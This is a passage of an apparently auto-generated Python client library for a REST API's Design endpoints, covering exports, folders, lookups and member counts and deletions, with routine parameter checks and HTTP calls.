    >>> thread = api.designs_id_exports_fk_get_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for exports (required)
    :return: DesignExport
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'fk']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exports_fk_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_fk_get`")
    # verify the required parameter 'fk' is set
    if ('fk' not in params) or (params['fk'] is None):
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_exports_fk_get`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}/exports/{fk}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'fk' in params:
        path_params['fk'] = params['fk']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # GET /Designs/{id}/exports/{fk}; response deserialized as DesignExport.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignExport',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_exports_fk_put(self, id, fk, **kwargs):
    """
    Update a related item by id for exports.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_fk_put(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for exports (required)
    :param DesignExport data:
    :return: DesignExport
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_exports_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_exports_fk_put_with_http_info(self, id, fk, **kwargs):
    """
    Update a related item by id for exports.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_fk_put_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for exports (required)
    :param DesignExport data:
    :return: DesignExport
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'fk', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exports_fk_put" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_fk_put`")
    # verify the required parameter 'fk' is set
    if ('fk' not in params) or (params['fk'] is None):
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_exports_fk_put`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}/exports/{fk}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'fk' in params:
        path_params['fk'] = params['fk']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'data' in params:
        # Optional request body: the DesignExport payload to store.
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # PUT /Designs/{id}/exports/{fk}; response deserialized as DesignExport.
    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignExport',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_exports_get(self, id, **kwargs):
    """
    Queries exports of Design.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[DesignExport]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_exports_get_with_http_info(id, **kwargs)
def designs_id_exports_get_with_http_info(self, id, **kwargs):
    """
    Queries exports of Design.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[DesignExport]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exports_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_get`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}/exports'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    if 'filter' in params:
        # Optional LoopBack filter, forwarded verbatim as a query string.
        query_params['filter'] = params['filter']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # GET /Designs/{id}/exports; response deserialized as list[DesignExport].
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[DesignExport]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_exports_post(self, id, **kwargs):
    """
    Creates a new instance in exports of this model.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_post(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignExport data:
    :return: DesignExport
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_exports_post_with_http_info(id, **kwargs)
def designs_id_exports_post_with_http_info(self, id, **kwargs):
    """
    Creates a new instance in exports of this model.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_exports_post_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignExport data:
    :return: DesignExport
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_exports_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_post`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}/exports'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'data' in params:
        # Optional request body: the DesignExport payload to create.
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # POST /Designs/{id}/exports; response deserialized as DesignExport.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignExport',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_folder_get(self, id, **kwargs):
    """
    Fetches belongsTo relation folder.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_folder_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: DesignFolder
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_folder_get_with_http_info(id, **kwargs)
def designs_id_folder_get_with_http_info(self, id, **kwargs):
    """
    Fetches belongsTo relation folder.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_folder_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: DesignFolder
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'refresh']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_folder_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_folder_get`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}/folder'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    if 'refresh' in params:
        # Optional flag forwarded as a query-string parameter.
        query_params['refresh'] = params['refresh']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # GET /Designs/{id}/folder; response deserialized as DesignFolder.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignFolder',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_get(self, id, **kwargs):
    """
    Find a model instance by {id} from the data source.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_get_with_http_info(id, **kwargs)
def designs_id_get_with_http_info(self, id, **kwargs):
    """
    Find a model instance by {id} from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_get`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    if 'filter' in params:
        # Optional LoopBack filter, forwarded verbatim as a query string.
        query_params['filter'] = params['filter']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # GET /Designs/{id}; response deserialized as Design.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_head(self, id, **kwargs):
    """
    Check whether a model instance exists in the data source.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_head(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: InlineResponse2002
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_head_with_http_info(id, **kwargs)
def designs_id_head_with_http_info(self, id, **kwargs):
    """
    Check whether a model instance exists in the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_head_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Model id (required)
    :return: InlineResponse2002
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_head" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_head`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # HEAD /Designs/{id}; response deserialized as InlineResponse2002.
    return self.api_client.call_api(resource_path, 'HEAD',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2002',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_count_get(self, id, **kwargs):
    """
    Counts members of Design.

    By default this performs a synchronous HTTP request. Supply a
    `callback` function to perform the request asynchronously; the
    request thread is then returned instead of the response data.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_count_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized body is wanted, not (status, headers) extras.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both return exactly what *_with_http_info
    # returns, so a single unconditional forward is equivalent.
    return self.designs_id_members_count_get_with_http_info(id, **kwargs)
def designs_id_members_count_get_with_http_info(self, id, **kwargs):
    """
    Counts members of Design.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_count_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else is rejected
    # with a TypeError below.
    all_params = ['id', 'where']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of the local namespace; validated kwargs are merged into
    # it and read back by name later.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_members_count_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_count_get`")

    # No collection-typed (csv/multi/...) parameters on this endpoint.
    collection_formats = {}
    # The '{format}' replace is a code-generator no-op for this path.
    resource_path = '/Designs/{id}/members/count'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    if 'where' in params:
        # Optional match criteria, forwarded verbatim as a query string.
        query_params['where'] = params['where']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        # Empty selection: omit the header and let the server decide.
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # GET /Designs/{id}/members/count; response deserialized as
    # InlineResponse2001.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2001',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_delete(self, id, **kwargs):
    """
    Deletes all members of this model.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_delete(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_delete_with_http_info(id, **kwargs)
def designs_id_members_delete_with_http_info(self, id, **kwargs):
    """
    Deletes all members of this model.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_delete_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'callback', '_return_http_data_only']
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_delete" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_delete`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members'.replace('{format}', 'json')
    path_params = {'id': params['id']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_fk_delete(self, id, fk, **kwargs):
    """
    Delete a related item by id for members.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_fk_delete(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_members_fk_delete_with_http_info(self, id, fk, **kwargs):
    """
    Delete a related item by id for members.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_fk_delete_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_fk_delete" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_fk_delete`")
    # verify the required parameter 'fk' is set
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_fk_delete`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members/{fk}'.replace('{format}', 'json')
    path_params = {'id': params['id'], 'fk': params['fk']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_fk_get(self, id, fk, **kwargs):
    """
    Find a related item by id for members.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_fk_get(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
